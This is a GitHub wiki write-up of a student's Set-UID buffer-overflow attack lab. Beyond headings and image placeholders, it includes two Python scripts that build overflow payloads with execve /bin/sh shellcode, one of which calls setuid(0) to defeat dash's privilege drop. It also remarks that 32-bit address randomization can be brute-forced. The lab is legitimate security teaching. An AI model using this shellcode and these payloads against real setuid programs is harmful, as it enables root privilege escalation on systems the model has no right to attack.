LAB ‐11 ‐ Buffer‐Overflow Attack Lab (Set‐UID Version) - archie-archana/securecodinglab GitHub Wiki

2.1 Turning Off Countermeasures

Address randomization - systems uses address space randomization to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult, guessing addresses is one of the critical steps of buffer-overflow attacks

image

Task 3: Launching Attack on 32-bit Program

5.1 Investigation

image

image

**First breakpoint ** image

image

5.2 Launching Attacks

image

image

image

image

Task 4: Launching Attack without Knowing Buffer Size (Level 2)

image

image

image

image

image

##Task 5: image

#!/usr/bin/python3 import sys

Replace this with the actual shellcode

shellcode = ( b"\x90\x90\x90\x90" + b"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e" b"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57" b"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05" )

replace with your shellcode

Fill the content with NOP's

content = bytearray(0x90 for i in range(517))

Put the shellcode somewhere in the payload

start = 100 # Adjust this to the desired position in the payload content[start:start + len(shellcode)] = shellcode

Decide the return address value and put it somewhere in the payload

ret = 0x7fffffffd8c0 # Replace with the actual target return address offset = 216 # Adjust this to the desired offset within the payload L = 8 # Use 4 for 32-bit address and 8 for 64-bit address

Convert the return address to bytes and write it to the payload

content[offset:offset + L] = ret.to_bytes(L, byteorder='little')

Print the payload

sys.stdout.buffer.write(content)

image

TASK-07

Defeating dash’s Countermeasure #!/usr/bin/python3 import sys

Replace the content with the actual shellcode

shellcode= ( "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31" "\xd2\x31\xc0\xb0\x0b\xcd\x80" ).encode('latin-1')

Fill the content with NOP's

content = bytearray(0x90 for i in range(517))

##################################################################

Put the shellcode somewhere in the payload

start = 400 # Change this number content[start:start + len(shellcode)] = shellcode

Decide the return address value

and put it somewhere in the payload

ret = 0xffffcab8 + 200 # Change this number offset = 112 # Change this number

L = 4 # Use 4 for 32-bit address and 8 for 64-bit address content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') ##################################################################

Write the content to a file

with open('badfile', 'wb') as f: f.write(content)

image

TASK-8

Defeating Address Randomization On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 2^19 = 524; 288 possibilities. This number is not that high and can be exhausted easily with the brute-force approach.

image